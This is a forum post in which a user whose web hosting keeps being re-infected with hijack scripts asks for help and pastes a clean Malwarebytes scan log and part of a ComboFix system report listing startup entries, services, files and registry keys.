Something following me

W

whiteguru

New Member
I seem to have a situation where *something* is following me around. I clean up my hosting from hijack scripts and malicious attack scripts, and I migrated to a new apache server, only to find that it has followed me there. Every time I clean up my domain hosting accounts, the scripts reappear. Many things are possible, including stealing my ftp passwords and the like. OK, so I have removed all that from the local machine. Installed Symantec Endpoint AV, found nothing. Installed Malwarebytes Antimalware Pro, that found nothing. Here is the report:

Malwarebytes Anti-Malware (PRO) 1.75.0.1300
www.malwarebytes.org

Database version: v2014.03.10.09

Windows 7 Service Pack 1 x86 NTFS
Internet Explorer 11.0.9600.16428
Chris :: CHRIS-PC [administrator]

Protection: Enabled

11/03/2014 9:39:52 AM
mbam-log-2014-03-11 (09-39-52).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 244103
Time elapsed: 6 minute(s), 51 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)
Click to expand...

OK, I ran Malwarebytes Anti-Rootkit. That found nothing of interest. It seemed to remove its own portable versions:

Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-63-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-1-163975518-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-r.mbam...
Removal finished
Click to expand...

So I read a post here about ComboFix, grabbed it and ran it. Checked the results against a search result which brought me to this site.

Have run ComboFix and there is a report. I'd like to present that here and seek advice.

ComboFix 14-03-10.01 - Chris 11/03/2014 14:24:57.3.2 - x86
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.61.1033.18.3070.1819 [GMT 11:00]
Running from: c:\users\Chris\Downloads\1-secure\ComboFix.exe
Command switches used :: c:\users\Chris\Downloads\1-secure\CFScript.txt
AV: Symantec Endpoint Protection *Disabled/Updated* {63DF5164-9100-186D-2187-8DC619EFD8BF}
FW: Symantec Endpoint Protection *Disabled* {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
SP: Symantec Endpoint Protection *Disabled/Updated* {D8BEB080-B73A-17E3-1B37-B6B462689202}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2014-02-11 to 2014-03-11 )))))))))))))))))))))))))))))))
.
.
2014-03-11 03:46 . 2014-03-11 03:46 -------- d-----w- c:\users\UpdatusUser\AppData\Local\temp
2014-03-11 03:46 . 2014-03-11 03:46 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-03-11 01:59 . 2014-03-11 03:46 -------- d-----w- c:\users\Chris\AppData\Local\temp
2014-03-11 00:06 . 2014-03-11 00:20 -------- d-----w- c:\program files\WhatsRunning
2014-03-10 23:51 . 2014-03-10 23:51 -------- d--h--w- c:\windows\PIF
2014-03-10 22:57 . 2014-03-10 23:04 -------- d-----w- c:\programdata\Malwarebytes' Anti-Malware (portable)
2014-03-10 22:56 . 2014-03-10 22:56 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\users\Chris\AppData\Roaming\Malwarebytes
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\programdata\Malwarebytes
2014-03-10 22:38 . 2013-04-04 03:50 22856 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-03-09 09:27 . 2014-03-09 09:27 -------- d-----w- c:\users\Chris\AppData\Local\Symantec
2014-03-09 09:12 . 2014-03-09 09:28 -------- d-----w- c:\program files\Common Files\Symantec Shared
2014-03-09 09:12 . 2014-03-09 09:12 142936 ----a-w- c:\windows\system32\drivers\SYMEVENT.SYS
2014-03-09 09:10 . 2014-03-09 09:10 420752 ----a-w- c:\windows\system32\SymVPN.dll
2014-03-09 09:10 . 2014-03-09 09:10 33264 ----a-w- c:\windows\system32\drivers\WGX.SYS
2014-03-09 09:10 . 2014-03-09 09:10 136080 ----a-w- c:\windows\system32\FwsVpn.dll
2014-03-09 09:10 . 2014-03-09 09:10 361360 ----a-w- c:\windows\system32\sysfer.dll
2014-03-09 09:10 . 2014-03-09 09:10 126440 ----a-w- c:\windows\system32\drivers\SysPlant.sys
2014-03-09 09:10 . 2014-03-09 09:10 11152 ----a-w- c:\windows\system32\sysferThunk.dll
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\programdata\regid.1992-12.com.symantec
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\windows\system32\drivers\SEP
2014-03-09 09:10 . 2014-03-10 21:39 -------- d-----w- c:\programdata\Symantec
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\program files\Symantec
2014-02-20 20:29 . 2014-02-20 20:31 -------- d-----w- c:\programdata\WinZip
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-11 02:53 . 2010-02-13 22:24 16608 ----a-w- c:\windows\gdrv.sys
2014-02-23 09:56 . 2012-03-29 19:34 692616 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-02-23 09:56 . 2011-05-17 23:08 71048 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-01-19 02:39 . 2014-01-19 02:39 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-01-19 02:39 . 2014-01-19 02:39 645120 ----a-w- c:\windows\system32\jsIntl.dll
2014-01-19 02:39 . 2014-01-19 02:39 194048 ----a-w- c:\windows\system32\elshyph.dll
2014-01-19 02:39 . 2014-01-19 02:39 71680 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe
2014-01-19 02:39 . 2014-01-19 02:39 62464 ----a-w- c:\windows\system32\tdc.ocx
2014-01-19 02:39 . 2014-01-19 02:39 34816 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-01-19 02:39 . 2014-01-19 02:39 337408 ----a-w- c:\windows\system32\html.iec
2014-01-19 02:39 . 2014-01-19 02:39 182272 ----a-w- c:\windows\system32\msls31.dll
2014-01-19 02:39 . 2014-01-19 02:39 1818112 ----a-w- c:\windows\system32\wininet.dll
2014-01-19 02:39 . 2014-01-19 02:39 61952 ----a-w- c:\windows\system32\iesetup.dll
2014-01-19 02:39 . 2014-01-19 02:39 1051136 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-01-19 02:39 . 2014-01-19 02:39 454656 ----a-w- c:\windows\system32\vbscript.dll
2014-01-19 02:39 . 2014-01-19 02:39 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-01-19 02:39 . 2014-01-19 02:39 24576 ----a-w- c:\windows\system32\licmgr10.dll
2014-01-19 02:39 . 2014-01-19 02:39 1926656 ----a-w- c:\windows\system32\inetcpl.cpl
2014-01-19 02:39 . 2014-01-19 02:39 151552 ----a-w- c:\windows\system32\iexpress.exe
2014-01-19 02:39 . 2014-01-19 02:39 139264 ----a-w- c:\windows\system32\wextract.exe
2014-01-19 02:39 . 2014-01-19 02:39 112128 ----a-w- c:\windows\system32\ieUnatt.exe
2014-01-19 02:39 . 2014-01-19 02:39 86016 ----a-w- c:\windows\system32\iesysprep.dll
2014-01-19 02:39 . 2014-01-19 02:39 74240 ----a-w- c:\windows\system32\SetIEInstalledDate.exe
2014-01-19 02:39 . 2014-01-19 02:39 61952 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-01-19 02:39 . 2014-01-19 02:39 553472 ----a-w- c:\windows\system32\jscript9diag.dll
2014-01-19 02:39 . 2014-01-19 02:39 51200 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-01-19 02:39 . 2014-01-19 02:39 48640 ----a-w- c:\windows\system32\mshtmler.dll
2014-01-19 02:39 . 2014-01-19 02:39 4240384 ----a-w- c:\windows\system32\jscript9.dll
2014-01-19 02:39 . 2014-01-19 02:39 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-01-19 02:39 . 2014-01-19 02:39 36352 ----a-w- c:\windows\system32\imgutil.dll
2014-01-19 02:39 . 2014-01-19 02:39 13312 ----a-w- c:\windows\system32\mshta.exe
2014-01-19 02:39 . 2014-01-19 02:39 111616 ----a-w- c:\windows\system32\IEAdvpack.dll
2014-01-19 02:39 . 2014-01-19 02:39 108032 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-01-19 02:39 . 2014-01-19 02:39 69632 ----a-w- c:\windows\system32\smss.exe
2014-01-19 02:39 . 2014-01-19 02:39 640512 ----a-w- c:\windows\system32\advapi32.dll
2014-01-19 02:39 . 2014-01-19 02:39 619520 ----a-w- c:\windows\system32\tdh.dll
2014-01-19 02:39 . 2014-01-19 02:39 3969472 ----a-w- c:\windows\system32\ntkrnlpa.exe
2014-01-19 02:39 . 2014-01-19 02:39 3914176 ----a-w- c:\windows\system32\ntoskrnl.exe
2014-01-19 02:39 . 2014-01-19 02:39 38912 ----a-w- c:\windows\system32\csrsrv.dll
2014-01-19 02:39 . 2014-01-19 02:39 1289096 ----a-w- c:\windows\system32\ntdll.dll
2014-01-19 02:39 . 2014-01-19 02:39 338944 ----a-w- c:\windows\system32\drivers\afd.sys
2014-01-19 02:39 . 2014-01-19 02:39 240496 ----a-w- c:\windows\system32\drivers\netio.sys
2014-01-19 02:39 . 2014-01-19 02:39 231424 ----a-w- c:\windows\system32\mswsock.dll
2014-01-19 02:39 . 2014-01-19 02:39 187752 ----a-w- c:\windows\system32\drivers\FWPKCLNT.SYS
2014-01-19 02:39 . 2014-01-19 02:39 1294272 ----a-w- c:\windows\system32\drivers\tcpip.sys
2014-01-19 02:38 . 2014-01-19 02:38 49152 ----a-w- c:\windows\system32\taskhost.exe
2014-01-19 02:38 . 2014-01-19 02:38 6144 ---ha-w- c:\windows\system32\api-ms-win-security-base-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 5120 ---ha-w- c:\windows\system32\api-ms-win-core-file-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4608 ---ha-w- c:\windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4608 ---ha-w- c:\windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-synch-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-misc-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-localization-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-memory-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-heap-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-util-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-string-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-profile-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-io-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-handle-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-debug-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-console-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 293376 ----a-w- c:\windows\system32\KernelBase.dll
2014-01-19 02:38 . 2014-01-19 02:38 271360 ----a-w- c:\windows\system32\conhost.exe
2014-01-19 02:38 . 2014-01-19 02:38 169984 ----a-w- c:\windows\system32\winsrv.dll
2014-01-19 02:37 . 2014-01-19 02:37 9728 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 906240 ----a-w- c:\windows\system32\FntCache.dll
2014-01-19 02:37 . 2014-01-19 02:37 604160 ----a-w- c:\windows\system32\d3d10level9.dll
2014-01-19 02:37 . 2014-01-19 02:37 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 417792 ----a-w- c:\windows\system32\WMPhoto.dll
2014-01-19 02:37 . 2014-01-19 02:37 4096 ---ha-w- c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 364544 ----a-w- c:\windows\system32\XpsGdiConverter.dll
2014-01-19 02:37 . 2014-01-19 02:37 3584 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 3419136 ----a-w- c:\windows\system32\d2d1.dll
2014-01-19 02:37 . 2014-01-19 02:37 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 293376 ----a-w- c:\windows\system32\dxgi.dll
2014-01-19 02:37 . 2014-01-19 02:37 2560 ---ha-w- c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 249856 ----a-w- c:\windows\system32\d3d10_1core.dll
2014-01-19 02:37 . 2014-01-19 02:37 2284544 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-01-19 02:37 . 2014-01-19 02:37 220160 ----a-w- c:\windows\system32\d3d10core.dll
2014-01-19 02:37 . 2014-01-19 02:37 207872 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
2014-01-19 02:37 . 2014-01-19 02:37 1988096 ----a-w- c:\windows\system32\d3d10warp.dll
2014-01-19 02:37 . 2014-01-19 02:37 187392 ----a-w- c:\windows\system32\UIAnimation.dll
2014-01-19 02:37 . 2014-01-19 02:37 161792 ----a-w- c:\windows\system32\d3d10_1.dll
2014-01-19 02:37 . 2014-01-19 02:37 1247744 ----a-w- c:\windows\system32\DWrite.dll
2014-01-19 02:37 . 2014-01-19 02:37 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2010-11-20 1174016]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RtHDVCpl.exe" [2010-03-17 8546848]
"snpstd"="c:\windows\vsnpstd.exe" [2003-12-30 40960]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2011-11-01 59240]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"LWS"="c:\program files\Logitech\LWS\Webcam Software\LWS.exe" [2011-11-11 205336]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2012-09-07 296096]
"Dell V310-V510 Series Fax Server"="c:\program files\Dell V310-V510 Series\fm3032.exe" [2009-12-30 311296]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2013-07-01 254336]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Adobe Gamma Loader.lnk - c:\program files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2010-2-14 113664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"mixer7"=wdmaud.drv
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Flowkeeper.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Flowkeeper.lnk
backup=c:\windows\pss\Flowkeeper.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^hpoddt01.exe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\hpoddt01.exe.lnk
backup=c:\windows\pss\hpoddt01.exe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google Update]
2012-07-01 12:20 116648 ----atw- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Logitech Vid]
2010-05-11 06:43 6061400 ----a-w- c:\program files\Logitech\Vid\Vid.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Logitech Vid HD]
2010-05-11 06:43 6061400 ----a-w- c:\program files\Logitech\Vid\Vid.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2012-09-07 02:30 296096 ----a-w- c:\program files\Real\RealPlayer\Update\realsched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001
.
R2 dleaCATSCustConnectService;dleaCATSCustConnectService;c:\windows\system32\spool\DRIVERS\W32X86\3\\dleaserv.exe [2009-07-01 98984]
R2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [2013-04-04 701512]
R2 SkypeUpdate;Skype Updater;c:\program files\Skype\Updater\Updater.exe [2013-09-04 171680]
R2 WCMVCAM;WebcamMax, WDM Video Capture;c:\windows\system32\DRIVERS\wcmvcam.sys [2011-06-23 1068216]
R3 ewusbnet;HUAWEI USB-NDIS miniport;c:\windows\system32\DRIVERS\ewusbnet.sys [2009-10-21 198656]
R3 hwusbdev;Huawei DataCard USB PNP Device;c:\windows\system32\DRIVERS\ewusbdev.sys [2009-10-12 101120]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-01-19 108032]
R3 PACSPTISVR-Sound_Organizer;PACSPTISVR-Sound_Organizer;c:\program files\Sony\Sound Organizer\Sony.Earth\PACSPTISVR.exe [2012-11-07 174176]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2010-11-20 15872]
R3 SyDvCtrl;SyDvCtrl;c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\SyDvCtrl32.sys [2013-10-21 28576]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2010-09-01 1343400]
S0 SymDS;Symantec Data Store;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMDS.SYS [2013-10-21 367704]
S0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMEFA.SYS [2013-10-21 935512]
S1 BHDrvx86;BHDrvx86;c:\programdata\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Data\Definitions\BASHDefs\20140304.011\BHDrvx86.sys [2014-03-03 1098968]
S1 ccSettings_{974A0163-23BB-4C9D-A3C2-611667F7A450};Symantec Endpoint Protection 12.1.4013.4013.105 Settings Manager;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\ccSetx86.sys [2013-10-21 134744]
S1 IDSVix86;IDSVix86;c:\programdata\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Data\Definitions\IPSDefs\20140307.011\IDSvix86.sys [2014-03-07 394456]
S1 SymIRON;Symantec Iron Driver;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\Ironx86.SYS [2013-10-21 175192]
S1 SYMNETS;Symantec Network Security WFP Driver;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMNETS.SYS [2013-10-21 341080]
S2 dlea_device;dlea_device;c:\windows\system32\dleacoms.exe [2009-07-01 602792]
S2 DragonSvc;Dragon Service;c:\program files\Common Files\Nuance\dgnsvc.exe [2012-07-18 310232]
S2 GEST Service;GEST Service for program management.;c:\program files\GIGABYTE\EnergySaver\GSvr.exe [2008-09-24 68136]
S2 MBAMScheduler;MBAMScheduler;c:\program files\Malwarebytes' Anti-Malware\mbamscheduler.exe [2013-04-04 418376]
S2 SepMasterService;Symantec Endpoint Protection;c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\ccSvcHst.exe [2013-10-21 144368]
S2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2012-12-28 383416]
S2 UMVPFSrv;UMVPFSrv;c:\program files\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [2012-01-18 450848]
S3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2014-02-17 108120]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-04-04 22856]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt86win7.sys [2009-07-13 139776]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
.
Contents of the 'Scheduled Tasks' folder
.
2014-03-11 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-03-29 09:56]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-17 07:05]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-17 07:05]
.
2014-03-10 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1813854299-3317763919-3206033757-1000Core.job
- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe [2012-07-01 12:20]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1813854299-3317763919-3206033757-1000UA.job
- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe [2012-07-01 12:20]
.
.
------- Supplementary Scan -------
.
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
TCP: DhcpNameServer = 10.1.1.1
TCP: Interfaces\{9E575FD1-707C-49A4-AB7B-3B52A7908E9D}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{A8669315-9D96-4AC1-8C0E-A8D09B1F0C75}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{D42CB96A-3720-412A-B8B3-1D254475ABC4}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{D87D39B8-7A27-4D89-A4A0-DA761B812D05}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{E2364279-D312-4EF1-AE1C-683CB479397F}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{E2A95CE3-6580-4E6C-BA15-81E9DDF11D1B}: NameServer = 198.142.0.51 61.88.88.88
FF - ProfilePath - c:\users\Chris\AppData\Roaming\Mozilla\Firefox\Profiles\sclbjaf5.default\
FF - prefs.js: browser.startup.homepage - about:newtab
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SepMasterService]
"ImagePath"="\"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\ccSvcHst.exe\" /s \"Symantec Endpoint Protection\" /m \"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\sms.dll\" /prefetch:1"
--
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SmcService]
"ImagePath"="\"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\Smc.exe\" /prefetch:1"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:61,9a,4c,64,7b,f9,ce,01
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*5mõ ]
@Class="Shell"
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*5mõ \OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.*5mõ ]
"0"=hex:47,3a,5c,55,74,69,6c,69,74,69,65,73,5c,4d,79,20,4d,75,73,69,63,5c,4d,
52,20,4d,49,53,54,45,52,20,2d,20,4b,79,72,69,65,2e,6d,70,33,00,00,72,69,65,\
"MRUListEx"=hex:00,00,00,00,ff,ff,ff,ff
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\SecuROM\License information*]
"datasecu"=hex:cb,b2,e6,c1,5d,39,51,5d,a1,bf,98,4a,8c,02,6c,e9,6c,55,9e,d4,b5,
ff,c0,55,f7,0d,cc,84,12,67,d9,81,a4,06,5e,7d,8a,d4,04,1f,82,a9,43,63,c4,2a,\
"rkeysecu"=hex:8f,82,27,2c,f0,1a,6a,7d,ee,8c,0e,e4,ff,c7,55,6b
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0002\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
